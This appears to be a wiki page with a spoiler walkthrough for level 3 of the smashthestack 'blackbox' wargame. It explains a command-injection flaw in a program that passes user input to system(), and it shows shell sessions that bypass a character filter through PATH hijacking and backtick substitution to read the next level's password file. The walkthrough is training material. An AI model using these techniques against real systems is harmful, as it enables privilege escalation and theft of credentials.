MRL WikiMain Page | About | Help | FAQ | Special pages | Log in

Printable version | Disclaimers | Privacy policy

Level 3

From MRL Wiki

blackbox.smashthestack.org - level 3

Spoilers Below

The proclist binary accepts an argument from stdin, which is appended to a string that is passed as an argument to system().

10: std::cin >> program;
...
21: command = "/bin/ps |grep ";
22: command += program;
23: system(command.c_str());
The tricky part is a rudimentary character filter, which successfully filters out any of the following characters:
;^&|><

There turned out to be multiple ways to accomplish this level, and there are probably further variations on the examples below.

level3@blackbox:/tmp/tyler3$ cat > grep
#!/bin/sh
/bin/cat /home/level4/password
level3@blackbox:/tmp/tyler3$ chmod a+x ./grep
level3@blackbox:/tmp/tyler3$ export PATH=.
level3@blackbox:/tmp/tyler3$ ~/proclist
Enter the name of the program: a
<password displays>
level3@blackbox:/tmp/tyler3$ touch password
level3@blackbox:/tmp/tyler3$ chmod 777 password
level3@blackbox:/tmp/tyler3$ cat > getpass
#!/bin/sh
cat /home/level4/password > /tmp/tyler3/password
level3@blackbox:/tmp/tyler3$ chmod a+x getpass
level3@blackbox:/tmp/tyler3$ ~/proclist
Enter the name of the program: `./getpass`
Usage: grep [OPTION]... PATTERN [FILE]...
Try `grep --help' for more information.
level3@blackbox:/tmp/tyler3$ cat password
<password displays>

Retrieved from "http://midnightresearch.com/wiki/index.php/Level_3"

This page has been accessed 1,547 times. This page was last modified on 5 September 2008, at 18:14.


Find

Browse
Main Page
Community portal
Current events
Recent changes
Random page
Help
Edit
Edit this page
Editing help
This page
Discuss this page
New section
Printable version
Context
Page history
What links here
Related changes
My pages
Log in / create account
Special pages
New pages
File list
Statistics
Moreā€¦